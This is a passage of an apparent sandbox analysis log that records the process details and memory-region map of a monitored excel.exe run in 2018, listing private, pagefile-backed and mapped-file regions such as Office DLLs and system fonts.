# Flog Txt Version 1
# Analyzer Version: 2.2.1
# Analyzer Build Date: May 28 2018 14:14:40
# Log Creation Date: 26.06.2018 20:58:15.808

Process:
	id = "1"
	image_name = "excel.exe"
	filename = "c:\\program files\\microsoft office\\office16\\excel.exe"
	page_root = "0x38da3000"
	os_pid = "0xed8"
	os_integrity_level = "0x2000"
	os_privileges = "0x800000"
	monitor_reason = "analysis_target"
	parent_id = "0"
	os_parent_pid = "0x0"
	cmd_line = "\"C:\\Program Files\\Microsoft Office\\Office16\\EXCEL.EXE\""
	cur_dir = "C:\\Users\\Nd9E1FYi\\Desktop\\"
	os_username = "X2VS1CUM\\Nd9E1FYi"
	os_groups = "X2VS1CUM\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb37" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]

Region:
	              id = 143
	        start_va = 0x7ffe0000
	          end_va = 0x7ffeffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007ffe0000"
	        filename = ""

Region:
	              id = 144
	        start_va = 0x818fe00000
	          end_va = 0x818fffffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000818fe00000"
	        filename = ""

Region:
	              id = 145
	        start_va = 0x8190000000
	          end_va = 0x81900fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000008190000000"
	        filename = ""

Region:
	              id = 146
	        start_va = 0x8190100000
	          end_va = 0x81901fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000008190100000"
	        filename = ""

Region:
	              id = 147
	        start_va = 0x8190200000
	          end_va = 0x81902fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000008190200000"
	        filename = ""

Region:
	              id = 148
	        start_va = 0x8190300000
	          end_va = 0x81903fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000008190300000"
	        filename = ""

Region:
	              id = 149
	        start_va = 0x8190400000
	          end_va = 0x81904fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000008190400000"
	        filename = ""

Region:
	              id = 150
	        start_va = 0x8190500000
	          end_va = 0x81905fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000008190500000"
	        filename = ""

Region:
	              id = 151
	        start_va = 0x8190600000
	          end_va = 0x81906fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000008190600000"
	        filename = ""

Region:
	              id = 152
	        start_va = 0x8190700000
	          end_va = 0x81907fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000008190700000"
	        filename = ""

Region:
	              id = 153
	        start_va = 0x8190800000
	          end_va = 0x81908fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000008190800000"
	        filename = ""

Region:
	              id = 154
	        start_va = 0x8190900000
	          end_va = 0x81909fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000008190900000"
	        filename = ""

Region:
	              id = 155
	        start_va = 0x8190b00000
	          end_va = 0x8190bfffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000008190b00000"
	        filename = ""

Region:
	              id = 156
	        start_va = 0x8190c00000
	          end_va = 0x8190cfffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000008190c00000"
	        filename = ""

Region:
	              id = 157
	        start_va = 0x8190d00000
	          end_va = 0x8190dfffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000008190d00000"
	        filename = ""

Region:
	              id = 158
	        start_va = 0x8190f00000
	          end_va = 0x8190ffffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000008190f00000"
	        filename = ""

Region:
	              id = 159
	        start_va = 0x8191000000
	          end_va = 0x81910fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000008191000000"
	        filename = ""

Region:
	              id = 160
	        start_va = 0x8191100000
	          end_va = 0x81911fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000008191100000"
	        filename = ""

Region:
	              id = 161
	        start_va = 0x8191200000
	          end_va = 0x81912fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000008191200000"
	        filename = ""

Region:
	              id = 162
	        start_va = 0x8191300000
	          end_va = 0x81913fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000008191300000"
	        filename = ""

Region:
	              id = 163
	        start_va = 0x8191400000
	          end_va = 0x81914fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000008191400000"
	        filename = ""

Region:
	              id = 164
	        start_va = 0x8191500000
	          end_va = 0x81915fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000008191500000"
	        filename = ""

Region:
	              id = 165
	        start_va = 0x8191600000
	          end_va = 0x81916fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000008191600000"
	        filename = ""

Region:
	              id = 166
	        start_va = 0x8191700000
	          end_va = 0x81917fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000008191700000"
	        filename = ""

Region:
	              id = 167
	        start_va = 0x8191800000
	          end_va = 0x81918fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000008191800000"
	        filename = ""

Region:
	              id = 168
	        start_va = 0x8191900000
	          end_va = 0x81919fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000008191900000"
	        filename = ""

Region:
	              id = 169
	        start_va = 0x8191a00000
	          end_va = 0x8191afffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000008191a00000"
	        filename = ""

Region:
	              id = 170
	        start_va = 0x8191b00000
	          end_va = 0x8191bfffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000008191b00000"
	        filename = ""

Region:
	              id = 171
	        start_va = 0x8191c00000
	          end_va = 0x8191cfffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000008191c00000"
	        filename = ""

Region:
	              id = 172
	        start_va = 0x8191e00000
	          end_va = 0x8191efffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000008191e00000"
	        filename = ""

Region:
	              id = 173
	        start_va = 0x8191f00000
	          end_va = 0x8191ffffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000008191f00000"
	        filename = ""

Region:
	              id = 174
	        start_va = 0x8192000000
	          end_va = 0x81920fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000008192000000"
	        filename = ""

Region:
	              id = 175
	        start_va = 0x20f8a380000
	          end_va = 0x20f8a38ffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000020f8a380000"
	        filename = ""

Region:
	              id = 176
	        start_va = 0x20f8a390000
	          end_va = 0x20f8a396fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f8a390000"
	        filename = ""

Region:
	              id = 177
	        start_va = 0x20f8a3a0000
	          end_va = 0x20f8a3b4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000020f8a3a0000"
	        filename = ""

Region:
	              id = 178
	        start_va = 0x20f8a3c0000
	          end_va = 0x20f8a3c3fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000020f8a3c0000"
	        filename = ""

Region:
	              id = 179
	        start_va = 0x20f8a3d0000
	          end_va = 0x20f8a3d0fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000020f8a3d0000"
	        filename = ""

Region:
	              id = 180
	        start_va = 0x20f8a3e0000
	          end_va = 0x20f8a3e1fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f8a3e0000"
	        filename = ""

Region:
	              id = 181
	        start_va = 0x20f8a3f0000
	          end_va = 0x20f8a4adfff
	     entry_point = 0x20f8a3f0000
	     region_type = mapped_file
	            name = "locale.nls"
	        filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")

Region:
	              id = 182
	        start_va = 0x20f8a4b0000
	          end_va = 0x20f8a4b1fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000020f8a4b0000"
	        filename = ""

Region:
	              id = 183
	        start_va = 0x20f8a4c0000
	          end_va = 0x20f8a4c6fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f8a4c0000"
	        filename = ""

Region:
	              id = 184
	        start_va = 0x20f8a4d0000
	          end_va = 0x20f8a4d0fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f8a4d0000"
	        filename = ""

Region:
	              id = 185
	        start_va = 0x20f8a4e0000
	          end_va = 0x20f8a4e0fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f8a4e0000"
	        filename = ""

Region:
	              id = 186
	        start_va = 0x20f8a4f0000
	          end_va = 0x20f8a4f0fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f8a4f0000"
	        filename = ""

Region:
	              id = 187
	        start_va = 0x20f8a500000
	          end_va = 0x20f8a500fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f8a500000"
	        filename = ""

Region:
	              id = 188
	        start_va = 0x20f8a510000
	          end_va = 0x20f8a60ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f8a510000"
	        filename = ""

Region:
	              id = 189
	        start_va = 0x20f8a610000
	          end_va = 0x20f8a611fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000020f8a610000"
	        filename = ""

Region:
	              id = 190
	        start_va = 0x20f8a620000
	          end_va = 0x20f8a62ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f8a620000"
	        filename = ""

Region:
	              id = 191
	        start_va = 0x20f8a630000
	          end_va = 0x20f8a631fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000020f8a630000"
	        filename = ""

Region:
	              id = 192
	        start_va = 0x20f8a640000
	          end_va = 0x20f8a641fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000020f8a640000"
	        filename = ""

Region:
	              id = 193
	        start_va = 0x20f8a650000
	          end_va = 0x20f8a651fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000020f8a650000"
	        filename = ""

Region:
	              id = 194
	        start_va = 0x20f8a660000
	          end_va = 0x20f8a661fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000020f8a660000"
	        filename = ""

Region:
	              id = 195
	        start_va = 0x20f8a670000
	          end_va = 0x20f8a671fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000020f8a670000"
	        filename = ""

Region:
	              id = 196
	        start_va = 0x20f8a680000
	          end_va = 0x20f8a680fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000020f8a680000"
	        filename = ""

Region:
	              id = 197
	        start_va = 0x20f8a690000
	          end_va = 0x20f8a691fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000020f8a690000"
	        filename = ""

Region:
	              id = 198
	        start_va = 0x20f8a6a0000
	          end_va = 0x20f8a6cdfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000020f8a6a0000"
	        filename = ""

Region:
	              id = 199
	        start_va = 0x20f8a6d0000
	          end_va = 0x20f8a6dffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f8a6d0000"
	        filename = ""

Region:
	              id = 200
	        start_va = 0x20f8a6e0000
	          end_va = 0x20f8a867fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000020f8a6e0000"
	        filename = ""

Region:
	              id = 201
	        start_va = 0x20f8a870000
	          end_va = 0x20f8a9f0fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000020f8a870000"
	        filename = ""

Region:
	              id = 202
	        start_va = 0x20f8aa00000
	          end_va = 0x20f8bdfffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000020f8aa00000"
	        filename = ""

Region:
	              id = 203
	        start_va = 0x20f8be00000
	          end_va = 0x20f8be00fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f8be00000"
	        filename = ""

Region:
	              id = 204
	        start_va = 0x20f8be10000
	          end_va = 0x20f8be10fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f8be10000"
	        filename = ""

Region:
	              id = 205
	        start_va = 0x20f8be20000
	          end_va = 0x20f8bedbfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000020f8be20000"
	        filename = ""

Region:
	              id = 206
	        start_va = 0x20f8bee0000
	          end_va = 0x20f8befffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f8bee0000"
	        filename = ""

Region:
	              id = 207
	        start_va = 0x20f8bf00000
	          end_va = 0x20f8c0b8fff
	     entry_point = 0x20f8bf00000
	     region_type = mapped_file
	            name = "office.odf"
	        filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\cultures\\office.odf")

Region:
	              id = 208
	        start_va = 0x20f8c0c0000
	          end_va = 0x20f8c0c3fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000020f8c0c0000"
	        filename = ""

Region:
	              id = 209
	        start_va = 0x20f8c0d0000
	          end_va = 0x20f8c0d6fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f8c0d0000"
	        filename = ""

Region:
	              id = 210
	        start_va = 0x20f8c0e0000
	          end_va = 0x20f8c0e1fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000020f8c0e0000"
	        filename = ""

Region:
	              id = 211
	        start_va = 0x20f8c0f0000
	          end_va = 0x20f8c1effff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f8c0f0000"
	        filename = ""

Region:
	              id = 212
	        start_va = 0x20f8c1f0000
	          end_va = 0x20f8c1f0fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f8c1f0000"
	        filename = ""

Region:
	              id = 213
	        start_va = 0x20f8c200000
	          end_va = 0x20f8c200fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f8c200000"
	        filename = ""

Region:
	              id = 214
	        start_va = 0x20f8c210000
	          end_va = 0x20f8c210fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f8c210000"
	        filename = ""

Region:
	              id = 215
	        start_va = 0x20f8c220000
	          end_va = 0x20f8c22efff
	     entry_point = 0x20f8c220000
	     region_type = mapped_file
	            name = "msointl30.dll"
	        filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\1033\\msointl30.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\1033\\msointl30.dll")

Region:
	              id = 216
	        start_va = 0x20f8c230000
	          end_va = 0x20f8c236fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f8c230000"
	        filename = ""

Region:
	              id = 217
	        start_va = 0x20f8c240000
	          end_va = 0x20f8c240fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000020f8c240000"
	        filename = ""

Region:
	              id = 218
	        start_va = 0x20f8c250000
	          end_va = 0x20f8c25ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f8c250000"
	        filename = ""

Region:
	              id = 219
	        start_va = 0x20f8c260000
	          end_va = 0x20f8c264fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000020f8c260000"
	        filename = ""

Region:
	              id = 220
	        start_va = 0x20f8c270000
	          end_va = 0x20f8c270fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000020f8c270000"
	        filename = ""

Region:
	              id = 221
	        start_va = 0x20f8c280000
	          end_va = 0x20f8c28ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f8c280000"
	        filename = ""

Region:
	              id = 222
	        start_va = 0x20f8c290000
	          end_va = 0x20f8c597fff
	     entry_point = 0x20f8c290000
	     region_type = mapped_file
	            name = "mso40uires.dll"
	        filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\MSO40UIRES.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\mso40uires.dll")

Region:
	              id = 223
	        start_va = 0x20f8c5a0000
	          end_va = 0x20f8cec0fff
	     entry_point = 0x20f8c5a0000
	     region_type = mapped_file
	            name = "mso99lres.dll"
	        filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\MSO99LRES.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\mso99lres.dll")

Region:
	              id = 224
	        start_va = 0x20f8ced0000
	          end_va = 0x20f91d0efff
	     entry_point = 0x20f8ced0000
	     region_type = mapped_file
	            name = "msores.dll"
	        filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\MSORES.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\msores.dll")

Region:
	              id = 225
	        start_va = 0x20f91d10000
	          end_va = 0x20f92d51fff
	     entry_point = 0x20f91d10000
	     region_type = mapped_file
	            name = "xlintl32.dll"
	        filename = "\\Program Files\\Microsoft Office\\Office16\\1033\\XLINTL32.DLL" (normalized: "c:\\program files\\microsoft office\\office16\\1033\\xlintl32.dll")

Region:
	              id = 226
	        start_va = 0x20f92d60000
	          end_va = 0x20f93096fff
	     entry_point = 0x20f92d60000
	     region_type = mapped_file
	            name = "sortdefault.nls"
	        filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")

Region:
	              id = 227
	        start_va = 0x20f930a0000
	          end_va = 0x20f93591fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000020f930a0000"
	        filename = ""

Region:
	              id = 228
	        start_va = 0x20f935a0000
	          end_va = 0x20f935a0fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000020f935a0000"
	        filename = ""

Region:
	              id = 229
	        start_va = 0x20f935b0000
	          end_va = 0x20f935b0fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000020f935b0000"
	        filename = ""

Region:
	              id = 230
	        start_va = 0x20f935c0000
	          end_va = 0x20f935c0fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f935c0000"
	        filename = ""

Region:
	              id = 231
	        start_va = 0x20f935d0000
	          end_va = 0x20f935d0fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f935d0000"
	        filename = ""

Region:
	              id = 232
	        start_va = 0x20f935e0000
	          end_va = 0x20f935e0fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f935e0000"
	        filename = ""

Region:
	              id = 233
	        start_va = 0x20f935f0000
	          end_va = 0x20f935f1fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000020f935f0000"
	        filename = ""

Region:
	              id = 234
	        start_va = 0x20f93600000
	          end_va = 0x20f93600fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000020f93600000"
	        filename = ""

Region:
	              id = 235
	        start_va = 0x20f93610000
	          end_va = 0x20f93610fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f93610000"
	        filename = ""

Region:
	              id = 236
	        start_va = 0x20f93620000
	          end_va = 0x20f93620fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f93620000"
	        filename = ""

Region:
	              id = 237
	        start_va = 0x20f93630000
	          end_va = 0x20f9363ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f93630000"
	        filename = ""

Region:
	              id = 238
	        start_va = 0x20f93640000
	          end_va = 0x20f937bafff
	     entry_point = 0x20f93640000
	     region_type = mapped_file
	            name = "msointl.dll"
	        filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\1033\\MSOINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\1033\\msointl.dll")

Region:
	              id = 239
	        start_va = 0x20f937c0000
	          end_va = 0x20f93fbffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000020f937c0000"
	        filename = ""

Region:
	              id = 240
	        start_va = 0x20f93fc0000
	          end_va = 0x20f940bffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f93fc0000"
	        filename = ""

Region:
	              id = 241
	        start_va = 0x20f940c0000
	          end_va = 0x20f942bffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f940c0000"
	        filename = ""

Region:
	              id = 242
	        start_va = 0x20f942c0000
	          end_va = 0x20f943bffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f942c0000"
	        filename = ""

Region:
	              id = 243
	        start_va = 0x20f943c0000
	          end_va = 0x20f9444bfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000020f943c0000"
	        filename = ""

Region:
	              id = 244
	        start_va = 0x20f94450000
	          end_va = 0x20f94450fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f94450000"
	        filename = ""

Region:
	              id = 245
	        start_va = 0x20f94460000
	          end_va = 0x20f9446bfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000020f94460000"
	        filename = ""

Region:
	              id = 246
	        start_va = 0x20f94470000
	          end_va = 0x20f94471fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000020f94470000"
	        filename = ""

Region:
	              id = 247
	        start_va = 0x20f94480000
	          end_va = 0x20f9448bfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000020f94480000"
	        filename = ""

Region:
	              id = 248
	        start_va = 0x20f94490000
	          end_va = 0x20f944a1fff
	     entry_point = 0x20f94490000
	     region_type = mapped_file
	            name = "normidna.nls"
	        filename = "\\Windows\\System32\\normidna.nls" (normalized: "c:\\windows\\system32\\normidna.nls")

Region:
	              id = 249
	        start_va = 0x20f944b0000
	          end_va = 0x20f944bcfff
	     entry_point = 0x20f944b0000
	     region_type = mapped_file
	            name = "comdlg32.dll.mui"
	        filename = "\\Windows\\System32\\en-US\\comdlg32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\comdlg32.dll.mui")

Region:
	              id = 250
	        start_va = 0x20f944c0000
	          end_va = 0x20f944c1fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000020f944c0000"
	        filename = ""

Region:
	              id = 251
	        start_va = 0x20f944d0000
	          end_va = 0x20f944d0fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f944d0000"
	        filename = ""

Region:
	              id = 252
	        start_va = 0x20f944e0000
	          end_va = 0x20f944e1fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000020f944e0000"
	        filename = ""

Region:
	              id = 253
	        start_va = 0x20f944f0000
	          end_va = 0x20f944f6fff
	     entry_point = 0x20f944f0000
	     region_type = mapped_file
	            name = "explorerframe.dll.mui"
	        filename = "\\Windows\\System32\\en-US\\explorerframe.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\explorerframe.dll.mui")

Region:
	              id = 254
	        start_va = 0x20f94500000
	          end_va = 0x20f94503fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f94500000"
	        filename = ""

Region:
	              id = 255
	        start_va = 0x20f94510000
	          end_va = 0x20f94513fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f94510000"
	        filename = ""

Region:
	              id = 256
	        start_va = 0x20f94520000
	          end_va = 0x20f94523fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f94520000"
	        filename = ""

Region:
	              id = 257
	        start_va = 0x20f94530000
	          end_va = 0x20f94530fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f94530000"
	        filename = ""

Region:
	              id = 258
	        start_va = 0x20f94540000
	          end_va = 0x20f94542fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f94540000"
	        filename = ""

Region:
	              id = 259
	        start_va = 0x20f94550000
	          end_va = 0x20f9456efff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000020f94550000"
	        filename = ""

Region:
	              id = 260
	        start_va = 0x20f94570000
	          end_va = 0x20f9458efff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000020f94570000"
	        filename = ""

Region:
	              id = 261
	        start_va = 0x20f94590000
	          end_va = 0x20f94590fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f94590000"
	        filename = ""

Region:
	              id = 262
	        start_va = 0x20f945a0000
	          end_va = 0x20f945a0fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f945a0000"
	        filename = ""

Region:
	              id = 263
	        start_va = 0x20f945b0000
	          end_va = 0x20f945b0fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f945b0000"
	        filename = ""

Region:
	              id = 264
	        start_va = 0x20f945c0000
	          end_va = 0x20f949bffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f945c0000"
	        filename = ""

Region:
	              id = 265
	        start_va = 0x20f949c0000
	          end_va = 0x20f949c1fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000020f949c0000"
	        filename = ""

Region:
	              id = 266
	        start_va = 0x20f949d0000
	          end_va = 0x20f949d0fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f949d0000"
	        filename = ""

Region:
	              id = 267
	        start_va = 0x20f949e0000
	          end_va = 0x20f94a55fff
	     entry_point = 0x20f949e0000
	     region_type = mapped_file
	            name = "~fontcache-system.dat"
	        filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-System.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-system.dat")

Region:
	              id = 268
	        start_va = 0x20f94a60000
	          end_va = 0x20f95a5ffff
	     entry_point = 0x20f94a60000
	     region_type = mapped_file
	            name = "~fontcache-fontface.dat"
	        filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-FontFace.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-fontface.dat")

Region:
	              id = 269
	        start_va = 0x20f95a60000
	          end_va = 0x20f9625ffff
	     entry_point = 0x20f95a60000
	     region_type = mapped_file
	            name = "~fontcache-s-1-5-21-2172869166-1497266965-2109836178-1000.dat"
	        filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-S-1-5-21-2172869166-1497266965-2109836178-1000.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-s-1-5-21-2172869166-1497266965-2109836178-1000.dat")

Region:
	              id = 270
	        start_va = 0x20f96260000
	          end_va = 0x20f9633efff
	     entry_point = 0x20f96260000
	     region_type = mapped_file
	            name = "segoeui.ttf"
	        filename = "\\Windows\\Fonts\\segoeui.ttf" (normalized: "c:\\windows\\fonts\\segoeui.ttf")

Region:
	              id = 271
	        start_va = 0x20f96340000
	          end_va = 0x20f96381fff
	     entry_point = 0x20f96340000
	     region_type = mapped_file
	            name = "d2d1.dll.mui"
	        filename = "\\Windows\\System32\\en-US\\d2d1.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\d2d1.dll.mui")

Region:
	              id = 272
	        start_va = 0x20f96390000
	          end_va = 0x20f9678ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f96390000"
	        filename = ""

Region:
	              id = 273
	        start_va = 0x20f96790000
	          end_va = 0x20f96f8ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f96790000"
	        filename = ""

Region:
	              id = 274
	        start_va = 0x20f96f90000
	          end_va = 0x20f97063fff
	     entry_point = 0x20f96f90000
	     region_type = mapped_file
	            name = "segoeuil.ttf"
	        filename = "\\Windows\\Fonts\\segoeuil.ttf" (normalized: "c:\\windows\\fonts\\segoeuil.ttf")

Region:
	              id = 275
	        start_va = 0x20f97070000
	          end_va = 0x20f97152fff
	     entry_point = 0x20f97070000
	     region_type = mapped_file
	            name = "seguisb.ttf"
	        filename = "\\Windows\\Fonts\\seguisb.ttf" (normalized: "c:\\windows\\fonts\\seguisb.ttf")

Region:
	              id = 276
	        start_va = 0x20f97160000
	          end_va = 0x20f9723bfff
	     entry_point = 0x20f97160000
	     region_type = mapped_file
	            name = "segoeuib.ttf"
	        filename = "\\Windows\\Fonts\\segoeuib.ttf" (normalized: "c:\\windows\\fonts\\segoeuib.ttf")

Region:
	              id = 277
	        start_va = 0x20f97240000
	          end_va = 0x20f97240fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f97240000"
	        filename = ""

Region:
	              id = 278
	        start_va = 0x20f97250000
	          end_va = 0x20f97325fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000020f97250000"
	        filename = ""

Region:
	              id = 279
	        start_va = 0x20f97330000
	          end_va = 0x20f97330fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f97330000"
	        filename = ""

Region:
	              id = 280
	        start_va = 0x20f97340000
	          end_va = 0x20f97375fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000020f97340000"
